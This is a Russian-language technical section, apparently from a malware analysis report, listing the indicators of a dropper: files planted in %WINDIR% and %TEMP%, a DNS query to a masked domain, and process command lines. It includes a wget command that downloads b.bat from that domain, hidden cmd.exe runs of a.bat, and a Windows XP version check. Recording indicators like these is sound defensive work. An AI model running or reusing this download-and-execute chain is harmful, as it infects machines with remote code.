Техническая информация
Ниже одним списком перечислены пути к файлам, DNS-запрос и командные строки запускаемых процессов.
- %WINDIR%\a.bat
- %WINDIR%\wget\bin\libeay32.dll
- %WINDIR%\wget\bin\libiconv2.dll
- %WINDIR%\wget\bin\libintl3.dll
- %WINDIR%\wget\bin\libssl32.dll
- %WINDIR%\wget\bin\wget.exe
- %WINDIR%\curl\curl.exe
- %WINDIR%\set-up.exe
- %TEMP%\is-rmet1.tmp\set-up.tmp
- %TEMP%\is-9761l.tmp\_isetup\_setup64.tmp
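- DNS ASK 88##.space (DNS-запрос; символы «##» в имени домена, по-видимому, являются маскировкой, поэтому точное сопоставление по этому индикатору невозможно)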
- '%WINDIR%\set-up.exe'
- '%WINDIR%\wget\bin\wget.exe' -c -P "%WINDIR%" "http://88##.space/rs/dy/p2/b4a/b.bat" --referer="alpha"
- '%TEMP%\is-rmet1.tmp\set-up.tmp' /SL5="$20268,14621765,730624,%WINDIR%\Set-up.exe"
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a.bat" "
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" ver "
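- '%WINDIR%\syswow64\findstr.exe' /IL "5.1." (вместе с предыдущей командой ver это, по-видимому, проверка версии Windows: 5.1 соответствует Windows XP)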